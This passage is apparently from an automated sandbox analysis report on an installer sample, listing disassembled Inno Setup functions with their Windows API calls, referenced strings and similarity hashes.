                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressByteCharMultiProcWide
                                                                  • String ID: SfcIsFileProtected$sfc.dll
                                                                  • API String ID: 2508298434-591603554
                                                                  • Opcode ID: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                                  • Instruction ID: 176d29f9623cbc30a6d26dfc77e51d4098360506d5c3757ea1f9e8bf8263b863
                                                                  • Opcode Fuzzy Hash: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                                  • Instruction Fuzzy Hash: 21416670A04218ABE720EB55DC86B9E77B8EB44309F5041B7E908A7293D7785F89CF5C
                                                                  Function 0042ED30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                                    • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                    • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                    • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                  • API String ID: 395431579-1506664499
                                                                  • Opcode ID: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                                  • Instruction ID: abd39ea96fbc8e8598eec473428a27bf92d63543bd8a2491ee7d7de58c90140d
                                                                  • Opcode Fuzzy Hash: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                                  • Instruction Fuzzy Hash: B1117330B00319BFD711EB62ED85B8E7BA8EB55704F90407BF400A6691D778AE05865D
                                                                  Function 004559E4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
                                                                  Strings
                                                                  • PendingFileRenameOperations2, xrefs: 00455A23
                                                                  • PendingFileRenameOperations, xrefs: 00455A14
                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                  • API String ID: 47109696-2115312317
                                                                  • Opcode ID: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                                  • Instruction ID: 0e3b4bd859061d9736a48b3f0c398de546ea7d73752f370084b2b16911b021d7
                                                                  • Opcode Fuzzy Hash: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                                  • Instruction Fuzzy Hash: 31F09671744A08EFDB04D6A6DC62E7A739DD744711FA04477F800D7682DA7DAD04962C
                                                                  Function 0047F340 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?,00000000), ref: 0047F3E6
                                                                  • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?), ref: 0047F3F3
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749), ref: 0047F4E8
                                                                  • FindClose.KERNEL32(000000FF,0047F513,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?), ref: 0047F506
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileNext
                                                                  • String ID:
                                                                  • API String ID: 2066263336-0
                                                                  • Opcode ID: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                                  • Instruction ID: 93840f20d66fcb2e286325320114c4d74e835c6895e54ad5a4f30f132b089a3b
                                                                  • Opcode Fuzzy Hash: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                                  • Instruction Fuzzy Hash: 19512F71A00658AFCB21DF65CC45ADEB7B8EB48319F5084BAA818E7341D7389F49CF54
                                                                  Function 0042126C Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenu.USER32(00000000), ref: 00421359
                                                                  • SetMenu.USER32(00000000,00000000), ref: 00421376
                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213AB
                                                                  • SetMenu.USER32(00000000,00000000), ref: 004213C7
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Menu
                                                                  • String ID:
                                                                  • API String ID: 3711407533-0
                                                                  • Opcode ID: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                                  • Instruction ID: 7bb7859a2cdb5f88754e70ccfd218d349751ef7fdbf43141b5448ef52fdf7b61
                                                                  • Opcode Fuzzy Hash: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                                  • Instruction Fuzzy Hash: 0141B03070025456EB20EB3AA8857AB36D64F61308F4856BFBC44DF7A3CA7CCC5583A9
                                                                  Function 00416B3A Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(?,?,?,?), ref: 00416B7C
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00416B96
                                                                  • SetBkColor.GDI32(?,00000000), ref: 00416BB0
                                                                  • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BD8
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Color$CallMessageProcSendTextWindow
                                                                  • String ID:
                                                                  • API String ID: 601730667-0
                                                                  • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                  • Instruction ID: 029c09512e86dc7a5584eefc6ebe6d25086567911d505253220d4c4c80a1b89b
                                                                  • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                  • Instruction Fuzzy Hash: D4114FB5304604AFD720EE6ECDC4E9777DCAF49310715882AB55ADB602C638F8418B39
                                                                  Function 00454F50 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                  • CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                  • String ID:
                                                                  • API String ID: 4071923889-0
                                                                  • Opcode ID: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                                  • Instruction ID: ae4672943cd7382c52be368afd98a0e744302f00d430d4f9e0a97d6bd95691cc
                                                                  • Opcode Fuzzy Hash: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                                  • Instruction Fuzzy Hash: 9C01F931A006087EEB10979D8C02F5B7BACDB89764F610127F904DB2C2C5789D408A68
                                                                  Function 004230C0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                  • EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                  • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                  • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A24620A480A570EnumFonts
                                                                  • String ID:
                                                                  • API String ID: 2630238358-0
                                                                  • Opcode ID: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                                  • Instruction ID: 69cee35535e214b40259e1ab78654d31e06b117eb7ed13cd681158bdd9fae355
                                                                  • Opcode Fuzzy Hash: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                                  • Instruction Fuzzy Hash: 2F01D2717442102AE700BF795CC6B9B36A4DF04318F40027BF808AB3C6D6BE9C0547AE
                                                                  Function 0045C084 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                  • FlushFileBuffers.KERNEL32(?), ref: 0045C2B9
                                                                  Strings
                                                                  • NumRecs range exceeded, xrefs: 0045C1B6
                                                                  • EndOffset range exceeded, xrefs: 0045C1ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: File$BuffersFlush
                                                                  • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                  • API String ID: 3593489403-659731555
                                                                  • Opcode ID: 0bf64ccb4770f6e98af3bdf021747f42c693f3348cd9375c8cc8fc116bf0a776
                                                                  • Instruction ID: f1827e02de76a306a1886b93aefbbb2344be70999cb9be9d3c0cbcfad0efad24
                                                                  • Opcode Fuzzy Hash: 0bf64ccb4770f6e98af3bdf021747f42c693f3348cd9375c8cc8fc116bf0a776
                                                                  • Instruction Fuzzy Hash: 35616334A002548FDB25DF25C891ADAB7B5AF49305F0084DAED88AB353D7749EC9CF54
                                                                  Function 004980B4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                    • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                    • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                    • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                    • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                    • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                    • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                                    • Part of subcall function 00409B70: 6F551CD0.COMCTL32(004980D6), ref: 00409B70
                                                                    • Part of subcall function 0041094C: GetCurrentThreadId.KERNEL32 ref: 0041099A
                                                                    • Part of subcall function 00419038: GetVersion.KERNEL32(004980EA), ref: 00419038
                                                                    • Part of subcall function 0044F73C: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                    • Part of subcall function 0044F73C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                                    • Part of subcall function 0044FBE4: GetVersionExA.KERNEL32(0049B790,00498103), ref: 0044FBF3
                                                                    • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                    • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                    • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                    • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                                    • Part of subcall function 00456ED4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                    • Part of subcall function 0046441C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                    • Part of subcall function 0046441C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                    • Part of subcall function 0046CC10: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                    • Part of subcall function 004786B4: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                    • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                    • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                    • Part of subcall function 004950C0: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004950D9
                                                                  • SetErrorMode.KERNEL32(00000001,00000000,00498178), ref: 0049814A
                                                                    • Part of subcall function 00497E74: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                    • Part of subcall function 00497E74: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                    • Part of subcall function 004244CC: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244EB
                                                                    • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  • ShowWindow.USER32(?,00000005,00000000,00498178), ref: 004981AB
                                                                    • Part of subcall function 00481B8C: SetActiveWindow.USER32(?), ref: 00481C3A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                  • String ID: Setup
                                                                  • API String ID: 3870281231-3839654196
                                                                  • Opcode ID: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                  • Instruction ID: d0c772c7b00e67a50ac74b8b43c66aaf35bd51fc0d8445b6be8c1c392d06dbfc
                                                                  • Opcode Fuzzy Hash: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                  • Instruction Fuzzy Hash: 6E31A471208A409ED601BBB7ED53A293B98EF89B18B61447FF80482593DE3D5C158A7E
                                                                  Function 0042DBF8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DC34
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DCA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue
                                                                  • String ID: 2H
                                                                  • API String ID: 3660427363-1900415311
                                                                  • Opcode ID: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                                  • Instruction ID: 6f29e5db34dee79be2e4bdbc2feb63702d0df34b1de6f6cc3bdc936bcd48876b
                                                                  • Opcode Fuzzy Hash: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                                  • Instruction Fuzzy Hash: 88414271E04529ABDB11DF95D881BAFB7B8EF05704FA18466E800F7241D778EE01CBA9
                                                                  Function 004539F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A3E
                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A47
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID: .tmp
                                                                  • API String ID: 1375471231-2986845003
                                                                  • Opcode ID: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                                  • Instruction ID: 5c47afe113f3b23246b8f03ea8338b9bfcdda488aecdb3892d8cb76e5c942ae9
                                                                  • Opcode Fuzzy Hash: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                                  • Instruction Fuzzy Hash: 4A213374A00218ABDB01EFA5C8529DFB7B9EF48305F50457BE801B7342DA7C9F059BA9
                                                                  Function 0047BE88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C10E,00000000,0047C124,?,?,?,?,00000000), ref: 0047BEEA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID: RegisteredOrganization$RegisteredOwner
                                                                  • API String ID: 3535843008-1113070880
                                                                  • Opcode ID: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                                  • Instruction ID: 7ba728e1ef3f38ce6dcb00f7549556e1698566df6bc9e7584ed9d3abf6b47640
                                                                  • Opcode Fuzzy Hash: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                                  • Instruction Fuzzy Hash: 2CF09060704244AFEB00E665DC92BEA33A9D745304F20803BE2048B392D779AE00CB5C
                                                                  Function 0046EC64 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                                  Strings
                                                                  Memory Dump Source
